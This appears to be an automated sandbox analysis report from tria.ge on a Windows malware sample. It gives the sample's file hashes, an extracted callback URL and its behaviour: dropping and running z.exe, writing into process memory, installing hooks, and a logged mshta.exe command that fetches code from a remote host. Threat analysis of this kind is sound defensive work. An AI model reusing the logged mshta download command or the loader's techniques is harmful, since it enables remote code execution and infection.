Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
08/01/2024, 23:56
Behavioral task
behavioral1
Sample
4ccacea000c555b1a333175803ba0af5.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4ccacea000c555b1a333175803ba0af5.exe
Resource
win10v2004-20231215-en
General
-
Target
4ccacea000c555b1a333175803ba0af5.exe
-
Size
691KB
-
MD5
4ccacea000c555b1a333175803ba0af5
-
SHA1
8e919e3a04036ee3b5122d3fb047d907d23d1e3d
-
SHA256
f81cea3cf23dc2d75ad5c9deb707b07807c90a55520e441a7630aa7573f95bb0
-
SHA512
0bca51112c16fe66ac910289bf665168f25d71c4101123987c0afafdc698b93549eaf82e64be315ff9296cb3710a7d6375543952ab8e13f8d0aaf8de795d13ea
-
SSDEEP
12288:MSJsWPOGw+qYwxPsw5gubWPRJ+wsHdLgRU3M7tToSGRpQ7E5x36NuP:MSnwKwauipJXlCc7tkSGRWix36
Malware Config
Extracted
http://rerererererere.com/inst.php?id=forbidden
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2728 z.exe -
Loads dropped DLL 2 IoCs
pid Process 3048 4ccacea000c555b1a333175803ba0af5.exe 3048 4ccacea000c555b1a333175803ba0af5.exe -
resource yara_rule behavioral1/memory/3048-0-0x0000000000400000-0x0000000000507000-memory.dmp upx behavioral1/files/0x0009000000012224-14.dat upx behavioral1/memory/3048-18-0x00000000030C0000-0x00000000034BC000-memory.dmp upx behavioral1/files/0x0009000000012224-23.dat upx behavioral1/memory/2728-19-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral1/memory/3048-17-0x0000000000400000-0x0000000000507000-memory.dmp upx behavioral1/files/0x0009000000012224-16.dat upx behavioral1/files/0x0009000000012224-12.dat upx behavioral1/files/0x0009000000012224-10.dat upx behavioral1/memory/2728-36-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral1/memory/2728-37-0x0000000000400000-0x00000000007FC000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2728 z.exe 2728 z.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3048 wrote to memory of 2728 3048 4ccacea000c555b1a333175803ba0af5.exe 24 PID 3048 wrote to memory of 2728 3048 4ccacea000c555b1a333175803ba0af5.exe 24 PID 3048 wrote to memory of 2728 3048 4ccacea000c555b1a333175803ba0af5.exe 24 PID 3048 wrote to memory of 2728 3048 4ccacea000c555b1a333175803ba0af5.exe 24
Processes
-
C:\Users\Admin\AppData\Local\Temp\4ccacea000c555b1a333175803ba0af5.exe"C:\Users\Admin\AppData\Local\Temp\4ccacea000c555b1a333175803ba0af5.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Users\Admin\AppData\Roaming\z.exe"C:\Users\Admin\AppData\Roaming\z.exe" forbidden2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2728
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat" "1⤵PID:1312
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://rerererererere.com/inst.php?id=forbidden1⤵PID:2588
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
167B
MD5e5a2cf708be039ebe72233673c1f2ac7
SHA1cca4b5f8c08e07779f4eddd7e3c960d7f68078f8
SHA2561f67a80290e77b7ec48c8b676bcc076ff5b271e2caf17352b1880d65a956e43c
SHA5120d47a1ccf419c4cb8fc1a25b35470ba3b51e49a6045fe1efcd533ebbe9d69a92a1a7b60f2666e1419613c0bd45ffd128623adb11c313c1b3749727f5a4a9f645
-
Filesize
2KB
MD58dd8a82ab6a26e8334c40c7f27dadeeb
SHA10c113f851beb5e826619a532f43c188eb3318462
SHA256493b37eb7748239d3e6ef899de9f86cd4124b4e6aeecd2a09a2afed35c74b27a
SHA512886602b8a1c43cc295c4a55ec7921af40ed1cd7654aa7d393a6ef117c7b78e3875b97e60229c80c86e078acaaec632c9bfcd6338d7760c9242aa85792e2bf331
-
Filesize
1KB
MD564493807b631d4640721422f65db10f4
SHA1426ef0d69ec6c4b7d60931efc2c312a1670b6ded
SHA25617868f7672fb1ef5d208e640ef963b3f5257ec6dfabd8538b77c95b7a6f685ce
SHA5129d3d0be0e1fe2868b462f0cdeff0a26e483edc4ff2b616ab557e650568465c143865fb70cd15df478d15609a5c2a00063e0792f05bc8f07c332f34e2d27b307f
-
Filesize
12KB
MD5294d4f3a470fd19559b3714967a238a1
SHA14231bbd7ebe6e1413ec06528532da616cb3e74b9
SHA256065ead59437163606059257e4efb110e2313b524c8ffb0d5bc964512994e2571
SHA512a576888b91cbb8332c9246bd12565474026ed256864c4cc334311becc1a3af6663e9c853ba51d7b2ab022468d81d376b98de82ca9582f3ba1685f24fdbe7e9ef
-
Filesize
45KB
MD5a02ded02c5c7d23f5678a922dab56726
SHA14f42ce884ddfec7577d3f340deca9565feb7ecaa
SHA25649edb7ecf9ea7cb90a59ebda9f7adcc1af8694f432b51ca74fd41ba378a5ca65
SHA512f35213cf69e978b000e79dd377c434eaac6cfe37fc47f6e4568f9da7531394ad2142383cdc19d30868488c62518f8f4fa8a8a27d2b24f121067746b2dce3eb26